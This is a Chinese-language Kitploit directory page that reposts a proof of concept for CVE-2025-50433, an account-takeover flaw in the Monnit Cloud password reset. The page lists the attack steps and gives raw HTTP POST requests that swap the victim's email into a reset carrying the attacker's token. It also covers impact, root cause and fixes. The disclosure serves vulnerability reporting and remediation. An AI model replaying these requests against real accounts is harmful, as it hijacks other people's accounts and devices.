Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-50433 — 针对严重的 Monnit Cloud 账户接管(CVE-2025-50433)的概念验证,利用密码重置中缺失的令牌-电子邮件验证,并提供攻击步骤、根本原因和修复措施。 | Kitploit
工具/GitHubGitHub/0xmandor/cve-2025-50433
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试身份验证
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

针对严重的 Monnit Cloud 账户接管(CVE-2025-50433)的概念验证,利用密码重置中缺失的令牌-电子邮件验证,并提供攻击步骤、根本原因和修复措施。

查看仓库
19个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-50433 — 影响Monnit云平台(*.imonnit.com)的严重账户接管漏洞

摘要

*.imonnit.com 存在一个严重的认证漏洞,允许完全账户接管(ATO) 任何用户账户,且无需受害者交互。

后端未能验证密码重置令牌与目标电子邮件之间的关联,导致攻击者可以使用自己有效的重置令牌来重置任何受害者账户的密码。


攻击向量(逐步PoC)

  1. 攻击者创建账户 A([email protected])。
  2. 受害者拥有账户 B([email protected])。
  3. 攻击者为账户 A 和 B 请求密码重置。
  4. 攻击者仅收到账户 A 的有效重置令牌。
  5. 攻击者使用令牌 A 打开密码重置表单:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. 提交前,攻击者将电子邮件和用户名字段更改为 受害者 的电子邮件:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. 后端错误地接受了不匹配的电子邮件和令牌。
  2. 受害者的密码被重置,攻击者获得受害者账户的完全访问权限。

影响

  • 完全账户接管(ATO)。
  • 完全访问受害者仪表板、传感器和账户数据。
  • 能够修改设备、通知和配置。
  • 无需受害者交互即可实现权限提升。
  • 远程利用,无需任何前提条件。

严重性

CVSS 3.1:9.8(严重)
向量:AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


受影响域名

root@kitploit:~
*.imonnit.com

根本原因

密码重置端点未验证重置令牌是否属于重置操作期间提供的同一电子邮件,从而允许使用攻击者控制的令牌进行任意密码重置。


受影响端点

root@kitploit:~
/Account/PasswordReset/

供应商:Monnit Corporation


建议

  • 在后台强制执行严格的令牌-电子邮件绑定验证。
  • 拒绝任何令牌与关联账户不匹配的密码重置请求。
  • 使用后立即失效令牌。

发现者

Mohamed Mandor (0xmandor) GitHub:https://github.com/0xmandor

下载工具